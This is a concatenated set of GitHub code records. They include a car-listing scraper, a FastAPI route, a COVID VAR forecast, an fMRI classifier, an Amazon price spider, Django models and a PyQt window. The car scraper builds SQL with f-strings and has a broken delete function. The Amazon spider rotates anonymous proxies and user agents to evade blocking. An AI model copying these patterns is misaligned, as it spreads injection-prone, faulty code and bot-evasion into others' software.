price=listing.find_all(class_='offer-price__number')\n price=re.findall(\"\"\"(.+)\"\"\",str(price))[0].replace(\" \",'')\n price = int(price)\n params=listing.find_all(class_='ds-param')\n try:\n year=int(params[0].get_text().replace(\" \",\"\"))\n except:\n year=0\n try:\n fuel=params[3].get_text().replace(\"\\n\",\"\")\n except:\n fuel = params[2].get_text().replace(\"\\n\", \"\")\n try:\n region=listing.find(class_='ds-location-region').get_text()[1:-1]\n except:\n region=''\n try:\n city=listing.find(class_='ds-location-city').get_text()\n except:\n city=''\n try:\n odometr=int(params[1].get_text().replace(\" \",\"\").replace(\"km\",''))\n except:\n odometr=0\n model=listing.find(class_='offer-title').get_text().replace(\"\\n\",\"\").replace(f'{mark} ','').lstrip().rstrip()\n try:\n m=re.findall(\"(.+) \\d\\..+\",model)[0]\n model=m\n except:\n model=model\n try:\n title = listing.find(class_='offer-title').get_text().replace(\"\\n\", \"\").lstrip().rstrip()\n except:\n title='No title'\n # img_url=listing.find(class_='offer-item__photo ds-photo-container')\n try:\n img_url=re.findall('data-srcset=\"(.+) 768w\"',str(listing.find('img')))[0]\n except:\n img_url='Not found'\n try:\n subtitle=listing.find(class_='offer-item__subtitle ds-title-complement hidden-xs').get_text()\n except:\n subtitle='No subtitle'\n try:\n l_id=int(re.findall('data-ad-id=\"(\\d+)\"',str(listing))[0])\n except:\n l_id=404\n\n try:\n volume=int(params[2].get_text().replace(\" \",\"\").replace(\"cm3\",\"\").replace(\"\\n\",\"\"))\n except:\n volume=1\n # print(lisitng_link,price,year,fuel,region,city,odometr,model,volume)\n data=[lisitng_link,price,year,fuel,region,city,odometr,title,volume,l_id,mark,model,img_url,subtitle]\n return data\n\ndef find_n_pages(link): #it checks how many pages haas each mark but no more than 500 because it is limit of otomoto.pl\n txt=parser(link)\n n=int(re.findall('\\((.+)\\)', txt)[0].replace(\" \",''))//32+1\n\n if n>500:\n n=500\n return n\n\n\ndef format_data(data): # formating data for db\n new_data=\"\"\n for i in data:\n if \"'\" in str(i):\n i=i.replace(\"'\",\"\")\n\n new_data+=f\"'{i}',\"\n return new_data[:-1]\n\n@shared_task()\ndef create_data():\n\n delete_all_data()\n # it will find listing by marks(ex.GAZ).\n # link='https://www.otomoto.pl/osobowe/?search%5Bfilter_enum_damaged%5D=0&search%5Border%5D=created_at_first%3Adesc&search%5Bbrand_program_id%5D%5B0%5D=&search%5Bcountry%5D=&page={}'\n link='https://www.otomoto.pl/osobowe/{}/?search%5Bfilter_enum_has_vin%5D=1&search%5Bfilter_enum_damaged%5D=0&search%5Border%5D=created_at%3Adesc&search%5Bbrand_program_id%5D%5B0%5D=&search%5Bcountry%5D=&page={}'\n marks=['Ferrari', 'Lotus' ,'McLaren', 'Trabant','Tesla']\n # List of marks upper\n\n for mark in marks:\n sleep(1)\n l=0\n n=find_n_pages(link.format(mark.replace(' ','-'),1))\n print(f'{n} pages in {mark}' )\n for p in range(1,n+1):\n page=link.format(mark.replace(' ','-'),p)\n cann = sqlite3.connect(PATH_TO_DB)\n cursor = cann.cursor()\n for listing in find_listings(parser(page)):\n sleep(2)\n try:\n data=find_data(listing,mark)\n data=format_data(data)\n\n cursor.execute(\n f\"\"\"INSERT INTO Listings VALUES({data})\"\"\")\n except Exception as e:\n print(f'Error {e}\\n{page}')\n continue\n l += 1\n cann.commit()\n return 'пропарсил'\n\n\ndef delete_all_data():\n cann = sqlite3.connect()\n cursor = cann.cursor()\n cursor.execute(PATH_TO_DB)\n cann.commit()\n cann.close()\n\n","repo_name":"AlexFreemann/Greenwood_Django_Project","sub_path":"greenwood/homepage/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33151109370","text":"import sys, os; sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\nfrom common.constants import *\nfrom common.logger import logger\nimport time\nimport requests\nfrom fastapi import FastAPI, Body\nimport uvicorn\n\n\n################################################################################\n# app/routes\n################################################################################\n\napp = FastAPI()\n\n\n@app.post(\"/proc_request\")\nasync def route_proc_request(email: str = Body(...), country: str = Body(...)) -> dict:\n \"\"\"Маршрут - обработать запрос пользователя.\n\n Args:\n email (str): Адрес электронной почты пользователя.\n country (str): Страна, гимн которой хотят получить.\n\n Returns:\n dict: {\"status_code\": число, \"status_message\": текст}.\n \"\"\"\n result = False\n\n try:\n if not email or \\\n not country:\n raise Exception(f\"Parameter value = null\")\n\n # Пишем информацию о запросе пользователя в базу данных, для сбора статистики.\n response = requests.post(\n url = MS_DB_URL + \"/journalize_request\",\n json = {\"email\": email, \"country\": country}\n )\n if response.status_code != 200:\n raise Exception(f\"{MS_DB_NAME}: {response.status_code}-> {response.text}\")\n data = response.json()\n if data[\"status_code\"] != \"0\":\n raise Exception(f'{MS_DB_NAME}: {data[\"status_code\"]} -> {data[\"status_message\"]}')\n\n # Проверяем наличие данных о стране в кэш.\n response = requests.post(\n url = MS_CACHE_URL + \"/get_country\",\n json = {\"country\": country}\n )\n if response.status_code != 200:\n raise Exception(f\"{MS_CACHE_NAME}: {response.status_code}-> {response.text}\")\n data = response.json()\n if data[\"status_code\"] not in \"01\":\n raise Exception(f'{MS_CACHE_NAME}: {data[\"status_code\"]} -> {data[\"status_message\"]}')\n\n # Данных о стране нет в кэш, вызываем url processor.\n if data[\"status_code\"] != \"0\":\n response = requests.post(\n url = MS_MB_URL + \"/call_urlp\",\n json = {\"email\": email, \"country\": country}\n )\n\n # Данных о стране есть в кэш, вызываем file processor.\n else:\n response = requests.post(\n url = MS_MB_URL + \"/call_fp\",\n json = {\"email\": email, \"country\": country, \"country_url\": data[\"url\"]}\n )\n\n if response.status_code != 200:\n raise Exception(f\"{MS_MB_NAME}: {response.status_code} -> {response.text}\")\n data = response.json()\n if data[\"status_code\"] != \"0\":\n raise Exception(f'{MS_MB_NAME}: {data[\"status_code\"]} -> {data[\"status_message\"]}')\n\n result = {\"status_code\": \"0\", \"status_message\": \"Success\"}\n except Exception as exc:\n logger.debug(str(exc), extra = {\"ms\": MS_UI_NAME, \"method\": \"route_proc_request\"})\n result = {\"status_code\": \"-1\", \"status_message\": f\"Something went wrong: {exc}\"}\n\n return result\n\n\nif __name__ == \"__main__\":\n time.sleep(int(MS_UI_RUN_DELAY))\n uvicorn.run(\n app = \"ms_1_ui:app\",\n host = MS_UI_FASTAPI_HOST,\n port = int(MS_UI_FASTAPI_PORT),\n reload = True)","repo_name":"sys321/python_bootcamp_hw_22_2","sub_path":"ms_1_ui/ms_1_ui.py","file_name":"ms_1_ui.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9884434","text":"import math\n\ndef is_prime(num):\n if isinstance(num, float):\n return False\n try:\n num=int(num)\n if num < 2:\n return False\n for i in range(2, int(math.sqrt(num)) + 1):\n if num % i == 0:\n return False\n return True\n except:\n return \"Please enter a valid number\"\n","repo_name":"esirK/prime-numbers","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9491405446","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, date, timedelta\nfrom dateutil import parser\nfrom statsmodels.tsa.vector_ar.vecm import coint_johansen\nfrom statsmodels.tsa.api import VAR\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.stats.stattools import durbin_watson\nfrom statsmodels.tools.eval_measures import rmse, aic\n#from sklearn.metrics import mean_squared_error\nfrom statsmodels.tsa.stattools import grangercausalitytests\nfrom statsmodels.tsa.stattools import acf\n\n#references: https://www.analyticsvidhya.com/blog/2018/09/multivariate-time-series-guide-forecasting-modeling-python-codes/\n#references: https://www.machinelearningplus.com/time-series/vector-autoregression-examples-python/\ndef date_to_datetime(d):\n # You may need to modify this function, depending on your data types.\n #month = d.month\n #print(month)\n #print(len(d))\n\n if len(d) > 10:\n \tm = re.search(r'(?<=-)\\w+', d)\n \td = m.group(0)\n #m = re.sub(\"([0-9][0-9].)[0-9]+\",\"\" ,d)\n #print(m)\n #value = pd.to_datetime(d, format='%Y%m%d', errors='ignore')\n value = parser.parse(d)\n #print(value)\n #value = time.strptime(value, '%d.%m.%y')\n #print(value)\n value = '%04i-%02i-%02i' % (value.year, value.month, value.day)\n return value\n\ndef get_differences(df):\n\tdf['next_case'] = df['cases']\n\tdf['next_case'] = df['cases'].shift(periods = -1)\n\tdf['difference'] = df['next_case'] - df['cases']\n\t#print(df.head())\n\treturn df\n\n########## read cases csv ######################\n\ndf = pd.read_csv(\"us-states.csv\", header = 0)\n#df = df[['date','state','cases', 'deaths']]\ndf = df[['date','state','cases']]\ndf = df[df['state'] != 'District of Columbia']\ndf['date'] = df['date'].apply(date_to_datetime)\n#df['population'] = df['state'].apply(add_population)\n#df['population_weight'] = df['cases'] / df['population'] * 100\n\n######## Read hospital bed csv ################\n### TRANSFORM DATA BY GROUPBY AND MERGINING DATA ON DATE AND STATE VALUES #########\ndf2 = pd.read_csv(\"covid19-NatEst.csv\", header = 0, index_col = 0)\ndf2 = df2[['State name', 'Day for which estimate is made','Number of patients in an inpatient care location who have suspected or confirmed COVID-19, estimate']]\ndf2 = df2.rename(columns={\"Number of patients in an inpatient care location who have suspected or confirmed COVID-19, estimate\" : \"bed amount\"})\ndf2 = df2.rename(columns={'Day for which estimate is made' : \"date\"})\ndf2= df2[df2['State name'] != 'United States']\ndf2 = df2[df2['State name'] != 'District of Columbia']\ndf2['dateTime'] = df2['date'].apply(date_to_datetime)\ndf2 = df2.drop(columns = 'date')\nnew_df = df2.merge(df, left_on=['dateTime','State name'], right_on = ['date','state'], how='left')\nnew_df = new_df.drop(columns = 'dateTime')\nnew_df = new_df.sort_values('date')\n#new_df = new_df.groupby(\"date\").sum().reset_index()\n#print(new_df)\ndata = new_df.drop(columns = 'date', axis = 1)\ndata.index = new_df.date\n\ndata = data.drop(columns = ['state','State name'])\ndata.dropna(inplace=True)\n\n\n####################### VAR model attempt #2 ##########################\n\n\n##### run grangers causation matrix on data to assess if attributes have causality \ndef grangers_causation(data): \n for c in data.columns:\n for r in data.columns:\n result = grangercausalitytests(data[[r, c]], maxlag=2, verbose=False)\n p_values = np.min([result[i+1][0]['ssr_chi2test'][1] for i in range(2)])\n #p_value = np.min(p_values)\n if r != c:\n \tprint(\"p-value for \" + r + \", \" + c + \" is: \" + str(p_values))\n \tif p_values < 0.05:\n \t\tprint(\"Statistically significant!!\")\n\ndf = new_df.drop(columns = ['state','State name'])\ndf = df.groupby(\"date\").sum().reset_index()\ndf = df.set_index('date')\ngrangers_causation(df) \n#granger_test = grangercausalitytests(df, maxlag=2, verbose=True)\n#print(granger_test)\n\n##### run adfuller test on data to assess if stationary #################\ndef adfuller_test(df):\n r = adfuller(df, autolag='AIC')\n p_value = round(r[1], 4)\n if p_value <= 0.05:\n print(\"p-value = \" + str(p_value) + \": Can reject the Null Hypothesis because it seems stationary\")\n else:\n print(\"p-value = \" + str(p_value) + \": Cannot reject the Null Hypothesis because it seems non-stationary\")\n\n#nobs = 4\ndf_train = df[:int(0.9*(len(df)))]\ndf_test = df[int(0.9*(len(df))):]\nprint(df_train.head())\n# Check size\nprint(df_train.shape) \nprint(df_test.shape) \n\n###### difference the dataset to make it stationary #############\ndf_differenced = df_train.diff().dropna()\ndf_differenced = df_differenced.diff().dropna()\n\n###### assess adfuller test ##############\nadfuller_test(df_differenced['bed amount'])\nadfuller_test(df_differenced['cases'])\n \n\n###create and fit model \nmodel = VAR(df_differenced)\nmodel_fit = model.fit(maxlags=7, ic='aic')\nprint(model_fit.summary())\n\nlength = (len(df_test))\ncolumns = ['bed amount_differenced2', 'cases_differenced2']\nforecast_mf = model_fit.forecast(y=df_differenced.values[-model_fit.k_ar:], steps=length)\nforecast_df = pd.DataFrame(forecast_mf, index=df.index[-length:], columns=columns)\n#print(forecast_df)\n\n\n#references: https://www.machinelearningplus.com/time-series/vector-autoregression-examples-python/ \n### need to invert data back to initial form before seeing outcome of data ##########\ndef invert_transformation(df_train, df_forecast, second_diff=False):\n df = df_forecast\n for col in df_train.columns: \n if second_diff:\n df[str(col)+'_differenced'] = (df_train[col].iloc[-1]-df_train[col].iloc[-2]) + df[str(col)+'_differenced2'].cumsum()\n df[str(col)+'_prediction'] = df_train[col].iloc[-1] + df[str(col)+'_differenced'].cumsum()\n return df\n\ndef inverse_difference(history, yhat, interval=1):\n\treturn yhat + history[-interval]\n\ndf_results = invert_transformation(df_train, forecast_df, second_diff=True) \n#print(df_results)\n\n\n###### plot the results of VAR ###########\nfig, axes = plt.subplots(ncols=2,figsize=(10,5))\nfor i, (col,ax) in enumerate(zip(df.columns, axes.flatten())):\n df_results[col+'_prediction'].plot(legend=True, ax=ax).autoscale(axis='x',tight=True)\n df_test[col][-length:].plot(legend=True, ax=ax);\n ax.set_title(col + \": Forecast vs Actuals\")\n\nplt.tight_layout();\nplt.show()\n\ndef f_accuracy(forecast, actual):\n mape = np.mean(np.abs(forecast - actual)/np.abs(actual)) \n print(\"MAPE is: \" + str(mape))\n rmse = np.sqrt(np.mean((forecast - actual)**2))\n print(\"RMSE is:\" + str(rmse))\n\n \n######## PRINT ACCURACY VALUES #####################\nprint('Accuracy of: bed amount')\naccuracy_prod = f_accuracy(df_results['bed amount_prediction'].values, df_test['bed amount'])\nprint('\\nAccuracy of: cases')\naccuracy_prod = f_accuracy(df_results['cases_prediction'].values, df_test['cases'])\n\nmodel_fit.plot_forecast(50)\nplt.show()\n\n\n\n","repo_name":"ehughson/covid19_forecasting","sub_path":"VAR.py","file_name":"VAR.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5842404223","text":"\n# coding: utf-8\n\n# In this exercise we will decode orientation using data collected for the Cognitive Neuroscience module in 2017. The subject performed a task that manipulated whether attention was placed towards the left or right visual field, or with no attentional focus (control condition).\n#\n# Notes from Dan:\n#\n# *v1_tseries are the time series files, as voxel * volume matrices\n# *v1_r2 are the variance explained per voxel by the FIR model with three conditions for task=0/1/2\n# design is a long form matrix (rows are individual events, first column are volumes and second column trial type) indicating the volume at which the different trial types occurred, 0 = neutral task (press button when stimulus cross changes color), 1 = attend left side and detect the direction of rotation, 2 = attend right side and detect the direction of rotation\n#\n# Stimulus was two gabor patches left and right of fixation flickering at 5 Hz.\n#\n# fixate: 500 ms\n# task cue: 500 ms\n# ISI: 1000 ms\n# stimulus: 4000 ms\n# change+resp: 1500 ms\n# var ITI: uniform distribution between 2500 and 9500 ms\n#\n# From staring at the deconvolutions it seems like the optimal time window to be looking at to separate trial types starts basically with the stimulus at 2 s, you start seeing task/neutral separation immediately and then by ~3-4 s you start seeing separation by left/right in most voxels.\n#\n# ##### Load data\n#\n# First we load the data files.\n\n# In[308]:\n\nimport random,os,json,glob,pickle\nimport numpy,pandas\nimport nibabel\nimport sklearn.multiclass\nfrom sklearn.svm import SVC,LinearSVC\nimport sklearn.metrics\nimport sklearn.model_selection\nimport sklearn.preprocessing\nimport scipy.stats,scipy.io\nimport random\n\n\ndatadir='data'\n\nprint('using data from %s'%datadir)\nlv1_ts=scipy.io.loadmat(os.path.join(datadir,'lv1_tseries.mat'))['lv1']\nrv1_ts=scipy.io.loadmat(os.path.join(datadir,'rv1_tseries.mat'))['rv1']\n# scale the data so that we don't need to bother with intercept in the model\nlv1_ts=sklearn.preprocessing.scale(lv1_ts.T)\nrv1_ts=sklearn.preprocessing.scale(rv1_ts.T)\ntsdata={'leftV1':lv1_ts,'rightV1':rv1_ts}\n\ndesmtx=scipy.io.loadmat(os.path.join(datadir,'design.mat'))['design']\nlabels=desmtx[:,0]\nntrials=desmtx.shape[0]\nntp,nvox=lv1_ts.shape\nprint(ntrials,'trials')\nprint(nvox,'voxels')\nprint(ntp,'timepoints')\nlv1_ts.shape\n\n\n# In[160]:\n\n# Reproduce the deconvolution analysis using an FIR model\n# the onset times are in volumes, so we just use tr=1\n# use 20-second window\n\ndef make_fir_model(onsets,tslength,hrflength=48,tr=1):\n \"\"\"\n generate an FIR model design matrix\n this only works for a single condition\n \"\"\"\n\n X=numpy.zeros((tslength,int(hrflength/tr)))\n for i in range(hrflength):\n for o in onsets:\n try:\n X[o+i,i]=1\n except:\n pass\n return X\n\ndesmtx_df=pandas.DataFrame(desmtx,columns=['condition','onset'])\nonsets={}\nonsets['neutral']=desmtx_df.query('condition==0').onset.values\nonsets['attendleft']=desmtx_df.query('condition==1').onset.values\nonsets['attendright']=desmtx_df.query('condition==2').onset.values\n\nleft_fir=make_fir_model(onsets['attendleft'],ntp)\nright_fir=make_fir_model(onsets['attendright'],ntp)\nneutral_fir=make_fir_model(onsets['neutral'],ntp)\nfir=numpy.hstack((left_fir,right_fir,neutral_fir))\n\n# show the design matrix\nprint(fir.shape)\n\n\n# In[161]:\n\n# estimate the model\n\nbeta_hat_left=numpy.linalg.inv(fir.T.dot(fir)).dot(fir.T).dot(lv1_ts)\nbeta_hat_right=numpy.linalg.inv(fir.T.dot(fir)).dot(fir.T).dot(rv1_ts)\n\npred_left=fir.dot(beta_hat_left)\n\n\n# In[162]:\n\n# check fit of the model over first 500 timepoints\nmeanpred=sklearn.preprocessing.scale(pred_left.mean(1))\n\npred_left.mean(1).shape\n\n\n# #### Classification analysis\n#\n# Now let's fit a classifier using balanced 8-fold crossvalidation. For now we only include attention trials. We will fit the classifier at each time point along the trial timecourse. We use a nested crossvalidation loop to determine the classifier parameters for each dataset.\n\n# In[338]:\n\ndef run_classifier(data,labels, shuffle=False,nfolds=8,scale=True,\n clf=None,verbose=False):\n \"\"\"\n run classifier for a single dataset\n \"\"\"\n features=data\n if scale:\n features=sklearn.preprocessing.scale(features)\n if shuffle:\n numpy.random.shuffle(labels)\n if not clf:\n clf=sklearn.svm.SVC(C=C)\n skf = sklearn.model_selection.StratifiedKFold(5,shuffle=True)\n pred=numpy.zeros(labels.shape[0])\n for train, test in skf.split(features,labels):\n clf.fit(features[train,:],labels[train])\n pred[test]=clf.predict(features[test,:])\n if verbose:\n print(clf.best_params_)\n acc=sklearn.metrics.accuracy_score(labels, pred)\n return acc\n\n\ndef get_accuracy_timeseries(tsdata,labels_attend,onsets,shuffle=False,clf=None,window=40,\n voxels=None):\n \"\"\"\n iterate over timepoints\n \"\"\"\n acc=numpy.zeros(window)\n for tp in range(window):\n # pull out data for each trial/timepoint\n if voxels is None:\n data=numpy.zeros((len(labels_attend),tsdata['leftV1'].shape[1] + tsdata['rightV1'].shape[1]))\n else:\n data=numpy.zeros((len(labels_attend),tsdata[voxels+'V1'].shape[1]))\n\n ctr=0\n for cond in ['attendleft','attendright']:\n for ons in onsets[cond]:\n if voxels is None:\n data[ctr,:]=numpy.hstack((tsdata['leftV1'][ons+tp,:],tsdata['rightV1'][ons+tp,:]))\n else:\n data[ctr,:]=tsdata[voxels+'V1'][ons+tp,:]\n\n ctr+=1\n acc[tp]=run_classifier(data,labels_attend,clf=clf,shuffle=shuffle)\n return acc\n\nlabels_attend=numpy.array([i for i in labels if i > 0])\n\n#clf=sklearn.linear_model.LogisticRegressionCV(penalty='l1',solver='liblinear')\n#clf=sklearn.svm.SVC(C=1)\ntuned_parameters = [{'C': [0.0005,0.001,0.005,0.01,0.05, 0.1]}]\nclf = sklearn.model_selection.GridSearchCV(sklearn.svm.LinearSVC(C=1), tuned_parameters, cv=5,n_jobs=6)\n\nprint('running for all')\nacc_all=get_accuracy_timeseries(tsdata,labels_attend,onsets,clf=clf)\nprint('running for left')\nacc_left=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='left',clf=clf)\nprint('running for right')\nacc_right=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='right',clf=clf)\n\n\n# #### Plot the results\n\n# In[339]:\n\n\n\n# Now let's run it with the labels shuffled 100 times to see how good these results are compared to chance. This will take a few minutes to complete. For a real analysis one would want to do this many more times (up to ~5000) in order for the distribution of extreme values to stabilize.\n\n# In[ ]:\n\n# if the saved results already exist then just reload them, to save time\nif 1:\n nruns=20\n hash='%08x'%random.getrandbits(32)\n acc_all_rand=numpy.zeros((nruns,40))\n acc_left_rand=numpy.zeros((nruns,40))\n acc_right_rand=numpy.zeros((nruns,40))\n\n for i in range(nruns):\n print(i)\n acc_all_rand[i,:]=get_accuracy_timeseries(tsdata,labels_attend,onsets,shuffle=True,clf=clf)\n acc_left_rand[i,:]=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='left',shuffle=True,clf=clf)\n acc_right_rand[i,:]=get_accuracy_timeseries(tsdata,labels_attend,onsets,voxels='right',shuffle=True,clf=clf)\n pickle.dump((acc_all_rand,acc_left_rand,acc_right_rand,clf),open('shuffled_accuracy_%s.pkl'%hash,'wb'))\n\n\n# Now we plot those results alongside the true classification results, adding an asterisk at the timepoints where the observed accuracy is greater than the 99th percentile of the random accuracies.\n\n# In[ ]:\n\nrand_percentile=99 # percent cutoff for randomization\n","repo_name":"poldrack/fmri-analysis-vm","sub_path":"analysis/MVPA/CogNeuro2017/ClassficationAnalysis-attention.py","file_name":"ClassficationAnalysis-attention.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"20585078430","text":"'''\n백준1005번\nACM Craft\n'''\nimport sys\nsys.setrecursionlimit(10**8)\n\nINF = 10**12\narr = []\ndef dfs(target):\n if len(dic[target])==0:\n visited[target]=bt[target]\n return bt[target]\n minBt = 0 \n for x in dic[target]:\n val = 0\n if visited[target]==-1:\n val = dfs(x)\n else:\n val = visited[x]\n minBt = max(minBt, val)\n visited[target] = minBt+bt[target]\n return minBt+bt[target] \n\nT = int(input())\nfrom collections import defaultdict\n\nfor t in range(T):\n N, K = map(int,input().split())\n bt = list(map(int,input().split())) #build time\n visited = [-1] * (N+1) \n dic = defaultdict(list)\n for k in range(K):\n x,y = map(int,sys.stdin.readline().split())\n dic[y-1].append(x-1)\n\n target = int(input())-1\n dfs(target)\n print(visited[target])\n","repo_name":"tjddls1124/Algorithm","sub_path":"baekjoon/baek1005.py","file_name":"baek1005.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13482945720","text":"import scrapy\r\nfrom fp.fp import FreeProxy\r\nfrom random_user_agent.params import OperatingSystem\r\nfrom random_user_agent.user_agent import UserAgent\r\n\r\nfrom AmazonWatcher.items import AmazonItem\r\n\r\n\r\nclass ItemscraperSpider(scrapy.Spider):\r\n name = 'itemscraper'\r\n allowed_domains = []\r\n\r\n def start_requests(self):\r\n self.item_id = getattr(self, \"item_id\", None)\r\n user_agent_rotator = UserAgent(operating_systems=[\r\n OperatingSystem.LINUX.value, OperatingSystem.WINDOWS.value], limit=100)\r\n start_urls = [\r\n f'https://www.amazon.in/dp/{self.item_id}'\r\n ]\r\n\r\n for url in start_urls:\r\n proxy = FreeProxy(timeout=1, rand=True, anonym=True).get()\r\n yield scrapy.Request(url=url, callback=self.parse,\r\n meta={\"proxies\": proxy},\r\n headers={\r\n \"User-Agent\": user_agent_rotator.get_random_user_agent()}\r\n )\r\n\r\n def parse(self, response):\r\n title = response.xpath(\r\n '//*[@id=\"productTitle\"]/text()').extract_first().strip()\r\n price = response.xpath(\r\n '//*[@id=\"priceblock_ourprice\"]/text()').extract_first()\r\n\r\n if not price:\r\n price = response.xpath(\r\n '//*[@id=\"priceblock_dealprice\"]/text()').extract_first()\r\n price = \"\".join(i for i in price if i.isdigit()\r\n or i == \".\").split(\".\")[0]\r\n\r\n item = AmazonItem(\r\n title, f\"https://www.amazon.in/dp/{self.item_id}?tag=gravity47-21\", price, self.item_id)\r\n\r\n yield item\r\n","repo_name":"VikrantReddy/AmazonWatcher","sub_path":"AmazonWatcher/spiders/itemscraper.py","file_name":"itemscraper.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1579297510","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.contrib.auth.models import User\n# Create your models here.\nclass qasession(models.Model):\n name = models.CharField(max_length=255)\n teacher = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n start = models.DateTimeField(blank=True, null=True)\n end = models.DateTimeField(blank=True, null=True)\n status = models.IntegerField(default=0, validators=[MinValueValidator(0), MaxValueValidator(1)])\n detail = models.CharField(max_length=1000)\n create_at = models.DateTimeField(auto_now_add=True)\n close_at = models.DateField(blank=True, null=True)\n\nclass question(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n qa = models.ForeignKey(qasession, on_delete=models.CASCADE, null=True)\n content = models.TextField(max_length=2000)\n create_at = models.DateTimeField(auto_now_add=True)\n\nclass answer(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n ques = models.ForeignKey(question, on_delete=models.CASCADE, null=True)\n content = models.TextField(max_length=2000)\n create_at = models.DateTimeField(auto_now_add=True)\n\nclass comment(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n ans = models.ForeignKey(answer, on_delete=models.CASCADE, null=True)\n content = models.TextField(max_length=2000)\n create_at = models.DateTimeField(auto_now_add=True)\n","repo_name":"nmthang153/QA-WebAppDev","sub_path":"QAsession/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9243260843","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom .. import icons_rc\nfrom ..BonTravailViews.BonTravailList import Ui_Dialog as Bontravail_UI\nfrom ..BonTravailViews.BonTravailConsulter import Ui_Dialog as BontravailConsulter_UI\nfrom ..DemandeInterventionViews.DemandeInterventionList import Ui_Dialog as DemandeIntervention_UI\nfrom ..DemandeInterventionViews.DemandeInterventionConsulter import Ui_Dialog as DemandeInterventionConsulter_UI\nfrom ..EquipementViews.EquipementList import Ui_Dialog as Equipement_UI\nfrom ..EquipementViews.EquipementConsulter import Ui_Dialog as EquipementConsulter_UI\nfrom ..BonApprovisonnementViews.BonApprovisionnementList import Ui_Dialog as BonApprovisionment_UI\nfrom ..BonApprovisonnementViews.BonApprovisionnementConsulter import Ui_Dialog as BonApprovisionmentConsulter_UI\nfrom .ListeUser import Ui_Dialog as ListeUser2\nfrom .Dashboard import Ui_Dialog as dashboard\nfrom PyQt5.QtWidgets import *\nfrom Services import ResponsableMaintenanceServices,ResponsableProductionServices,ResponsableChaineProductionServices,MagasinierServices\n\nfrom .Dashboard import Ui_Dialog as Dashboard_UI\nfrom ..Components.CollapsibleBox import CollapsibleBox\n\n\n\nfrom ..Components.Notifications import NotificationThread,Notification\nclass Ui_MainWindow(QtCore.QObject):\n\n \n def __init__(self,matricule,role,dialogSignIn,window) -> None:\n super(Ui_MainWindow,self).__init__()\n self.matricule = matricule\n self.role = role\n self.dialogSignIn=dialogSignIn\n self.window=window\n self.NotificationObject=Notification(self.window,self.matricule)\n \n def slideLeftMenu(self,x):\n if x==\"1\":\n width=self.left_side_menu.width()\n if width ==75:\n newwidth=285\n else:\n newwidth=75\n self.animation=QtCore.QPropertyAnimation(self.left_side_menu,b\"minimumWidth\")\n self.animation.setDuration(250)\n self.animation.setStartValue(width)\n self.animation.setEndValue(newwidth)\n self.animation.start()\n if x==\"2\":\n width=self.left_side_menu.width()\n if width ==75:\n newwidth=285\n self.animation=QtCore.QPropertyAnimation(self.left_side_menu,b\"minimumWidth\")\n self.animation.setDuration(250)\n self.animation.setStartValue(width)\n self.animation.setEndValue(newwidth)\n self.animation.start()\n if x==\"3\":\n width=self.left_side_menu.width()\n if width ==285:\n newwidth=75\n self.animation=QtCore.QPropertyAnimation(self.left_side_menu,b\"minimumWidth\")\n self.animation.setDuration(250)\n self.animation.setStartValue(width)\n self.animation.setEndValue(newwidth)\n self.animation.start()\n\n\n \n \n\n def handleadd(self):\n self.adduser = QtWidgets.QDialog()\n self.ui_adduser =ListeUser2(self.stackedWidget)\n self.ui_adduser.setupUi(self.adduser)\n self.stackedWidget.addWidget(self.adduser)\n self.stackedWidget.setCurrentWidget(self.adduser)\n\n def affdash(self):\n \n self.affda = QtWidgets.QDialog()\n self.ui_affda =dashboard()\n self.ui_affda.setupUi(self.affda)\n self.stackedWidget.addWidget(self.affda)\n self.stackedWidget.setCurrentWidget(self.affda)\n\n\n def displayBonTravail(self):\n self.dialogBonTravail = QtWidgets.QDialog()\n self.uiBonTravail = Bontravail_UI(self,self.dialogBonTravail)\n self.uiBonTravail.setupUi(self.dialogBonTravail)\n self.stackedWidget.addWidget(self.dialogBonTravail)\n self.stackedWidget.setCurrentWidget(self.dialogBonTravail)\n def displayDashboard(self):\n self.dialogDashboard = QtWidgets.QDialog()\n self.uiDashboard = Dashboard_UI()\n self.uiDashboard.setupUi(self.dialogDashboard)\n self.stackedWidget.addWidget(self.dialogDashboard)\n self.stackedWidget.setCurrentWidget(self.dialogDashboard)\n def displayBonTravailConsulter(self):\n self.dialogBonTravailConsulter = QtWidgets.QDialog()\n self.uiBonTravailConsulter = BontravailConsulter_UI(self)\n self.uiBonTravailConsulter.setupUi(self.dialogBonTravailConsulter)\n self.stackedWidget.addWidget(self.dialogBonTravailConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogBonTravailConsulter)\n def displayEquipement(self):\n self.dialogEquipement = QtWidgets.QDialog()\n self.uiEquipement = 